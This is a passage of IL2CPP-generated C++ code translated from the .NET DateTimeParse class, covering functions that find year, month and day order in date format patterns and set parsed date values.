argument*/NULL); if (!L_31) { goto IL_0094; } } { return (bool)0; } IL_0094: { int32_t L_32 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_32, (int32_t)1)); } IL_009a: { int32_t L_33 = V_4; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_34 = ___str0; int32_t L_35 = L_34->get_len_2(); if ((((int32_t)L_33) < ((int32_t)L_35))) { goto IL_0083; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_36 = ___str0; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_37 = ___str0; int32_t L_38 = L_37->get_len_2(); L_36->set_Index_1(L_38); return (bool)1; } IL_00b2: { return (bool)0; } } // System.Boolean System.DateTimeParse::GetYearMonthDayOrder(System.String,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetYearMonthDayOrder_mE9CAC6C3BFC905C6A5FDFD5DD7A701935DF43776 (String_t* ___datePattern0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___order2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; int32_t V_3 = 0; bool V_4 = false; int32_t V_5 = 0; Il2CppChar V_6 = 0x0; int32_t V_7 = 0; { V_0 = (-1); V_1 = (-1); V_2 = (-1); V_3 = 0; V_4 = (bool)0; V_5 = 0; goto IL_00f0; } IL_0013: { String_t* L_0 = ___datePattern0; int32_t L_1 = V_5; Il2CppChar L_2 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_0, L_1, /*hidden argument*/NULL); V_6 = L_2; Il2CppChar L_3 = V_6; if ((((int32_t)L_3) == ((int32_t)((int32_t)92)))) { goto IL_0029; } } { Il2CppChar L_4 = V_6; if ((!(((uint32_t)L_4) == ((uint32_t)((int32_t)37))))) { goto IL_0034; } } IL_0029: { int32_t L_5 = V_5; V_5 = ((int32_t)il2cpp_codegen_add((int32_t)L_5, (int32_t)1)); goto IL_00ea; } IL_0034: { Il2CppChar L_6 = V_6; if ((((int32_t)L_6) == ((int32_t)((int32_t)39)))) { goto IL_0040; } } { Il2CppChar L_7 = V_6; if ((!(((uint32_t)L_7) == ((uint32_t)((int32_t)34))))) { goto IL_0047; } } IL_0040: { bool L_8 = V_4; V_4 = (bool)((((int32_t)L_8) == ((int32_t)0))? 1 : 0); } IL_0047: { bool L_9 = V_4; if (L_9) { goto IL_00ea; } } { Il2CppChar L_10 = V_6; if ((!(((uint32_t)L_10) == ((uint32_t)((int32_t)121))))) { goto IL_007e; } } { int32_t L_11 = V_3; int32_t L_12 = L_11; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)L_12, (int32_t)1)); V_0 = L_12; goto IL_0062; } IL_005c: { int32_t L_13 = V_5; V_5 = ((int32_t)il2cpp_codegen_add((int32_t)L_13, (int32_t)1)); } IL_0062: { int32_t L_14 = V_5; String_t* L_15 = ___datePattern0; int32_t L_16 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_15, /*hidden argument*/NULL); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_14, (int32_t)1))) >= ((int32_t)L_16))) { goto IL_00ea; } } { String_t* L_17 = ___datePattern0; int32_t L_18 = V_5; Il2CppChar L_19 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_17, ((int32_t)il2cpp_codegen_add((int32_t)L_18, (int32_t)1)), /*hidden argument*/NULL); if ((((int32_t)L_19) == ((int32_t)((int32_t)121)))) { goto IL_005c; } } { goto IL_00ea; } IL_007e: { Il2CppChar L_20 = V_6; if ((!(((uint32_t)L_20) == ((uint32_t)((int32_t)77))))) { goto IL_00ae; } } { int32_t L_21 = V_3; int32_t L_22 = L_21; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)L_22, (int32_t)1)); V_1 = L_22; goto IL_0092; } IL_008c: { int32_t L_23 = V_5; V_5 = ((int32_t)il2cpp_codegen_add((int32_t)L_23, (int32_t)1)); } IL_0092: { int32_t L_24 = V_5; String_t* L_25 = ___datePattern0; int32_t L_26 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_25, /*hidden argument*/NULL); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_24, (int32_t)1))) >= ((int32_t)L_26))) { goto IL_00ea; } } { String_t* L_27 = ___datePattern0; int32_t L_28 = V_5; Il2CppChar L_29 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_27, ((int32_t)il2cpp_codegen_add((int32_t)L_28, (int32_t)1)), /*hidden argument*/NULL); if ((((int32_t)L_29) == ((int32_t)((int32_t)77)))) { goto IL_008c; } } { goto IL_00ea; } IL_00ae: { Il2CppChar L_30 = V_6; if ((!(((uint32_t)L_30) == ((uint32_t)((int32_t)100))))) { goto IL_00ea; } } { V_7 = 1; goto IL_00c5; } IL_00b9: { int32_t L_31 = V_7; V_7 = ((int32_t)il2cpp_codegen_add((int32_t)L_31, (int32_t)1)); int32_t L_32 = V_5; V_5 = ((int32_t)il2cpp_codegen_add((int32_t)L_32, (int32_t)1)); } IL_00c5: { int32_t L_33 = V_5; String_t* L_34 = ___datePattern0; int32_t L_35 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_34, /*hidden argument*/NULL); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_33, (int32_t)1))) >= ((int32_t)L_35))) { goto IL_00df; } } { String_t* L_36 = ___datePattern0; int32_t L_37 = V_5; Il2CppChar L_38 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_36, ((int32_t)il2cpp_codegen_add((int32_t)L_37, (int32_t)1)), /*hidden argument*/NULL); if ((((int32_t)L_38) == ((int32_t)((int32_t)100)))) { goto IL_00b9; } } IL_00df: { int32_t L_39 = V_7; if ((((int32_t)L_39) > ((int32_t)2))) { goto IL_00ea; } } { int32_t L_40 = V_3; int32_t L_41 = L_40; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)L_41, (int32_t)1)); V_2 = L_41; } IL_00ea: { int32_t L_42 = V_5; V_5 = ((int32_t)il2cpp_codegen_add((int32_t)L_42, (int32_t)1)); } IL_00f0: { int32_t L_43 = V_5; String_t* L_44 = ___datePattern0; int32_t L_45 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_44, /*hidden argument*/NULL); if ((((int32_t)L_43) >= ((int32_t)L_45))) { goto IL_0101; } } { int32_t L_46 = V_3; if ((((int32_t)L_46) < ((int32_t)3))) { goto IL_0013; } } IL_0101: { int32_t L_47 = V_0; if (L_47) { goto IL_0111; } } { int32_t L_48 = V_1; if ((!(((uint32_t)L_48) == ((uint32_t)1)))) { goto IL_0111; } } { int32_t L_49 = V_2; if ((!(((uint32_t)L_49) == ((uint32_t)2)))) { goto IL_0111; } } { int32_t* L_50 = ___order2; *((int32_t*)L_50) = (int32_t)0; return (bool)1; } IL_0111: { int32_t L_51 = V_1; if (L_51) { goto IL_0121; } } { int32_t L_52 = V_2; if ((!(((uint32_t)L_52) == ((uint32_t)1)))) { goto IL_0121; } } { int32_t L_53 = V_0; if ((!(((uint32_t)L_53) == ((uint32_t)2)))) { goto IL_0121; } } { int32_t* L_54 = ___order2; *((int32_t*)L_54) = (int32_t)1; return (bool)1; } IL_0121: { int32_t L_55 = V_2; if (L_55) { goto IL_0131; } } { int32_t L_56 = V_1; if ((!(((uint32_t)L_56) == ((uint32_t)1)))) { goto IL_0131; } } { int32_t L_57 = V_0; if ((!(((uint32_t)L_57) == ((uint32_t)2)))) { goto IL_0131; } } { int32_t* L_58 = ___order2; *((int32_t*)L_58) = (int32_t)2; return (bool)1; } IL_0131: { int32_t L_59 = V_0; if (L_59) { goto IL_0141; } } { int32_t L_60 = V_2; if ((!(((uint32_t)L_60) == ((uint32_t)1)))) { goto IL_0141; } } { int32_t L_61 = V_1; if ((!(((uint32_t)L_61) == ((uint32_t)2)))) { goto IL_0141; } } { int32_t* L_62 = ___order2; *((int32_t*)L_62) = (int32_t)3; return (bool)1; } IL_0141: { int32_t* L_63 = ___order2; *((int32_t*)L_63) = (int32_t)(-1); return (bool)0; } } // System.Boolean System.DateTimeParse::GetYearMonthOrder(System.String,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetYearMonthOrder_mEDFBD53F46F78F077914D6D042E63B05FF79608C (String_t* ___pattern0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___order2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; bool V_3 = false; int32_t V_4 = 0; Il2CppChar V_5 = 0x0; { V_0 = (-1); V_1 = (-1); V_2 = 0; V_3 = (bool)0; V_4 = 0; goto IL_00a6; } IL_0010: { String_t* L_0 = ___pattern0; int32_t L_1 = V_4; Il2CppChar L_2 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_0, L_1, /*hidden argument*/NULL); V_5 = L_2; Il2CppChar L_3 = V_5; if ((((int32_t)L_3) == ((int32_t)((int32_t)92)))) { goto IL_0026; } } { Il2CppChar L_4 = V_5; if ((!(((uint32_t)L_4) == ((uint32_t)((int32_t)37))))) { goto IL_002e; } } IL_0026: { int32_t L_5 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_5, (int32_t)1)); goto IL_00a0; } IL_002e: { Il2CppChar L_6 = V_5; if ((((int32_t)L_6) == ((int32_t)((int32_t)39)))) { goto IL_003a; } } { Il2CppChar L_7 = V_5; if ((!(((uint32_t)L_7) == ((uint32_t)((int32_t)34))))) { goto IL_003f; } } IL_003a: { bool L_8 = V_3; V_3 = (bool)((((int32_t)L_8) == ((int32_t)0))? 1 : 0); } IL_003f: { bool L_9 = V_3; if (L_9) { goto IL_00a0; } } { Il2CppChar L_10 = V_5; if ((!(((uint32_t)L_10) == ((uint32_t)((int32_t)121))))) { goto IL_0072; } } { int32_t L_11 = V_2; int32_t L_12 = L_11; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_12, (int32_t)1)); V_0 = L_12; goto IL_0056; } IL_0050: { int32_t L_13 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_13, (int32_t)1)); } IL_0056: { int32_t L_14 = V_4; String_t* L_15 = ___pattern0; int32_t L_16 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_15, /*hidden argument*/NULL); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_14, (int32_t)1))) >= ((int32_t)L_16))) { goto IL_00a0; } } { String_t* L_17 = ___pattern0; int32_t L_18 = V_4; Il2CppChar L_19 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_17, ((int32_t)il2cpp_codegen_add((int32_t)L_18, (int32_t)1)), /*hidden argument*/NULL); if ((((int32_t)L_19) == ((int32_t)((int32_t)121)))) { goto IL_0050; } } { goto IL_00a0; } IL_0072: { Il2CppChar L_20 = V_5; if ((!(((uint32_t)L_20) == ((uint32_t)((int32_t)77))))) { goto IL_00a0; } } { int32_t L_21 = V_2; int32_t L_22 = L_21; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_22, (int32_t)1)); V_1 = L_22; goto IL_0086; } IL_0080: { int32_t L_23 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_23, (int32_t)1)); } IL_0086: { int32_t L_24 = V_4; String_t* L_25 = ___pattern0; int32_t L_26 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_25, /*hidden argument*/NULL); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_24, (int32_t)1))) >= ((int32_t)L_26))) { goto IL_00a0; } } { String_t* L_27 = ___pattern0; int32_t L_28 = V_4; Il2CppChar L_29 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_27, ((int32_t)il2cpp_codegen_add((int32_t)L_28, (int32_t)1)), /*hidden argument*/NULL); if ((((int32_t)L_29) == ((int32_t)((int32_t)77)))) { goto IL_0080; } } IL_00a0: { int32_t L_30 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_30, (int32_t)1)); } IL_00a6: { int32_t L_31 = V_4; String_t* L_32 = ___pattern0; int32_t L_33 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_32, /*hidden argument*/NULL); if ((((int32_t)L_31) >= ((int32_t)L_33))) { goto IL_00b7; } } { int32_t L_34 = V_2; if ((((int32_t)L_34) < ((int32_t)2))) { goto IL_0010; } } IL_00b7: { int32_t L_35 = V_0; if (L_35) { goto IL_00c3; } } { int32_t L_36 = V_1; if ((!(((uint32_t)L_36) == ((uint32_t)1)))) { goto IL_00c3; } } { int32_t* L_37 = ___order2; *((int32_t*)L_37) = (int32_t)4; return (bool)1; } IL_00c3: { int32_t L_38 = V_1; if (L_38) { goto IL_00cf; } } { int32_t L_39 = V_0; if ((!(((uint32_t)L_39) == ((uint32_t)1)))) { goto IL_00cf; } } { int32_t* L_40 = ___order2; *((int32_t*)L_40) = (int32_t)5; return (bool)1; } IL_00cf: { int32_t* L_41 = ___order2; *((int32_t*)L_41) = (int32_t)(-1); return (bool)0; } } // System.Boolean System.DateTimeParse::GetMonthDayOrder(System.String,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetMonthDayOrder_mBB4BC48898E898A22EB1F203AEE286ED77CE9583 (String_t* ___pattern0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___order2, const RuntimeMethod* method) { int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; bool V_3 = false; int32_t V_4 = 0; Il2CppChar V_5 = 0x0; int32_t V_6 = 0; { V_0 = (-1); V_1 = (-1); V_2 = 0; V_3 = (bool)0; V_4 = 0; goto IL_00b7; } IL_0010: { String_t* L_0 = ___pattern0; int32_t L_1 = V_4; Il2CppChar L_2 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_0, L_1, /*hidden argument*/NULL); V_5 = L_2; Il2CppChar L_3 = V_5; if ((((int32_t)L_3) == ((int32_t)((int32_t)92)))) { goto IL_0026; } } { Il2CppChar L_4 = V_5; if ((!(((uint32_t)L_4) == ((uint32_t)((int32_t)37))))) { goto IL_0031; } } IL_0026: { int32_t L_5 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_5, (int32_t)1)); goto IL_00b1; } IL_0031: { Il2CppChar L_6 = V_5; if ((((int32_t)L_6) == ((int32_t)((int32_t)39)))) { goto IL_003d; } } { Il2CppChar L_7 = V_5; if ((!(((uint32_t)L_7) == ((uint32_t)((int32_t)34))))) { goto IL_0042; } } IL_003d: { bool L_8 = V_3; V_3 = (bool)((((int32_t)L_8) == ((int32_t)0))? 1 : 0); } IL_0042: { bool L_9 = V_3; if (L_9) { goto IL_00b1; } } { Il2CppChar L_10 = V_5; if ((!(((uint32_t)L_10) == ((uint32_t)((int32_t)100))))) { goto IL_0083; } } { V_6 = 1; goto IL_005c; } IL_0050: { int32_t L_11 = V_6; V_6 = ((int32_t)il2cpp_codegen_add((int32_t)L_11, (int32_t)1)); int32_t L_12 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_12, (int32_t)1)); } IL_005c: { int32_t L_13 = V_4; String_t* L_14 = ___pattern0; int32_t L_15 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_14, /*hidden argument*/NULL); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_13, (int32_t)1))) >= ((int32_t)L_15))) { goto IL_0076; } } { String_t* L_16 = ___pattern0; int32_t L_17 = V_4; Il2CppChar L_18 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_16, ((int32_t)il2cpp_codegen_add((int32_t)L_17, (int32_t)1)), /*hidden argument*/NULL); if ((((int32_t)L_18) == ((int32_t)((int32_t)100)))) { goto IL_0050; } } IL_0076: { int32_t L_19 = V_6; if ((((int32_t)L_19) > ((int32_t)2))) { goto IL_00b1; } } { int32_t L_20 = V_2; int32_t L_21 = L_20; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_21, (int32_t)1)); V_1 = L_21; goto IL_00b1; } IL_0083: { Il2CppChar L_22 = V_5; if ((!(((uint32_t)L_22) == ((uint32_t)((int32_t)77))))) { goto IL_00b1; } } { int32_t L_23 = V_2; int32_t L_24 = L_23; V_2 = ((int32_t)il2cpp_codegen_add((int32_t)L_24, (int32_t)1)); V_0 = L_24; goto IL_0097; } IL_0091: { int32_t L_25 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_25, (int32_t)1)); } IL_0097: { int32_t L_26 = V_4; String_t* L_27 = ___pattern0; int32_t L_28 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_27, /*hidden argument*/NULL); if ((((int32_t)((int32_t)il2cpp_codegen_add((int32_t)L_26, (int32_t)1))) >= ((int32_t)L_28))) { goto IL_00b1; } } { String_t* L_29 = ___pattern0; int32_t L_30 = V_4; Il2CppChar L_31 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_29, ((int32_t)il2cpp_codegen_add((int32_t)L_30, (int32_t)1)), /*hidden argument*/NULL); if ((((int32_t)L_31) == ((int32_t)((int32_t)77)))) { goto IL_0091; } } IL_00b1: { int32_t L_32 = V_4; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_32, (int32_t)1)); } IL_00b7: { int32_t L_33 = V_4; String_t* L_34 = ___pattern0; int32_t L_35 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_34, /*hidden argument*/NULL); if ((((int32_t)L_33) >= ((int32_t)L_35))) { goto IL_00c8; } } { int32_t L_36 = V_2; if ((((int32_t)L_36) < ((int32_t)2))) { goto IL_0010; } } IL_00c8: { int32_t L_37 = V_0; if (L_37) { goto IL_00d4; } } { int32_t L_38 = V_1; if ((!(((uint32_t)L_38) == ((uint32_t)1)))) { goto IL_00d4; } } { int32_t* L_39 = ___order2; *((int32_t*)L_39) = (int32_t)6; return (bool)1; } IL_00d4: { int32_t L_40 = V_1; if (L_40) { goto IL_00e0; } } { int32_t L_41 = V_0; if ((!(((uint32_t)L_41) == ((uint32_t)1)))) { goto IL_00e0; } } { int32_t* L_42 = ___order2; *((int32_t*)L_42) = (int32_t)7; return (bool)1; } IL_00e0: { int32_t* L_43 = ___order2; *((int32_t*)L_43) = (int32_t)(-1); return (bool)0; } } // System.Boolean System.DateTimeParse::TryAdjustYear(System.DateTimeResult&,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___year1, int32_t* ___adjustedYear2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C_MetadataUsageId); s_Il2CppMethodInitialized = true; } bool V_0 = false; Exception_t * __last_unhandled_exception = 0; NO_UNUSED_WARNING (__last_unhandled_exception); Exception_t * __exception_local = 0; NO_UNUSED_WARNING (__exception_local); int32_t __leave_target = -1; NO_UNUSED_WARNING (__leave_target); { int32_t L_0 = ___year1; if ((((int32_t)L_0) >= ((int32_t)((int32_t)100)))) { goto IL_001d; } } IL_0005: try { // begin try (depth: 1) DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_1 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_2 = L_1->get_calendar_10(); int32_t L_3 = ___year1; int32_t L_4 = VirtFuncInvoker1< int32_t, int32_t >::Invoke(27 /* System.Int32 System.Globalization.Calendar::ToFourDigitYear(System.Int32) */, L_2, L_3); ___year1 = L_4; goto IL_001d; } // end try (depth: 1) catch(Il2CppExceptionWrapper& e) { __exception_local = (Exception_t *)e.ex; if(il2cpp_codegen_class_is_assignable_from (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var, il2cpp_codegen_object_class(e.ex))) goto CATCH_0015; throw e; } CATCH_0015: { // begin catch(System.ArgumentOutOfRangeException) int32_t* L_5 = ___adjustedYear2; *((int32_t*)L_5) = (int32_t)(-1); V_0 = (bool)0; goto IL_0022; } // end catch (depth: 1) IL_001d: { int32_t* L_6 = ___adjustedYear2; int32_t L_7 = ___year1; *((int32_t*)L_6) = (int32_t)L_7; return (bool)1; } IL_0022: { bool L_8 = V_0; return L_8; } } // System.Boolean System.DateTimeParse::SetDateYMD(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___year1, int32_t ___month2, int32_t ___day3, const RuntimeMethod* method) { { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_1 = L_0->get_calendar_10(); int32_t L_2 = ___year1; int32_t L_3 = ___month2; int32_t L_4 = ___day3; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_5 = ___result0; int32_t L_6 = L_5->get_era_7(); bool L_7 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_1, L_2, L_3, L_4, L_6); if (!L_7) { goto IL_0021; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_8 = ___result0; int32_t L_9 = ___year1; int32_t L_10 = ___month2; int32_t L_11 = ___day3; DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_8, L_9, L_10, L_11, /*hidden argument*/NULL); return (bool)1; } IL_0021: { return (bool)0; } } // System.Boolean System.DateTimeParse::SetDateMDY(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateMDY_m15C5D980488D64E3A673443F6382D89F4B52DA7E (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___month1, int32_t ___day2, int32_t ___year3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_SetDateMDY_m15C5D980488D64E3A673443F6382D89F4B52DA7E_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = ___year3; int32_t L_2 = ___month1; int32_t L_3 = ___day2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_4 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_0, L_1, L_2, L_3, /*hidden argument*/NULL); return L_4; } } // System.Boolean System.DateTimeParse::SetDateDMY(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateDMY_m7EF8C6A06954821541C20B6780EAF704329CB324 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___day1, int32_t ___month2, int32_t ___year3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_SetDateDMY_m7EF8C6A06954821541C20B6780EAF704329CB324_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = ___year3; int32_t L_2 = ___month2; int32_t L_3 = ___day1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_4 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_0, L_1, L_2, L_3, /*hidden argument*/NULL); return L_4; } } // System.Boolean System.DateTimeParse::SetDateYDM(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateYDM_m06145EDE4B01E360FD3416E70F72CE50746F2CCE (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___year1, int32_t ___day2, int32_t ___month3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_SetDateYDM_m06145EDE4B01E360FD3416E70F72CE50746F2CCE_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = ___year1; int32_t L_2 = ___month3; int32_t L_3 = ___day2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_4 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_0, L_1, L_2, L_3, /*hidden argument*/NULL); return L_4; } } // System.Void System.DateTimeParse::GetDefaultYear(System.DateTimeResult&,System.Globalization.DateTimeStyles&) extern "C" IL2CPP_METHOD_ATTR void DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83_MetadataUsageId); s_Il2CppMethodInitialized = true; } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_1 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_2 = L_1->get_calendar_10(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_3 = ___result0; int32_t* L_4 = ___styles1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_5 = DateTimeParse_GetDateTimeNow_mBAF702F1D6A3F954D2520AD7B01FCA0F159DD759((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_3, (int32_t*)L_4, /*hidden argument*/NULL); int32_t L_6 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(18 /* System.Int32 System.Globalization.Calendar::GetYear(System.DateTime) */, L_2, L_5); L_0->set_Year_0(L_6); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_7 = ___result0; int32_t* L_8 = L_7->get_address_of_flags_8(); int32_t* L_9 = L_8; int32_t L_10 = *((int32_t*)L_9); *((int32_t*)L_9) = (int32_t)((int32_t)((int32_t)L_10|(int32_t)((int32_t)4096))); return; } } // System.Boolean System.DateTimeParse::GetDayOfNN(System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfNN_m98D15515975E0B06429DEDCAF14D3083001ADCA0 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfNN_m98D15515975E0B06429DEDCAF14D3083001ADCA0_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; 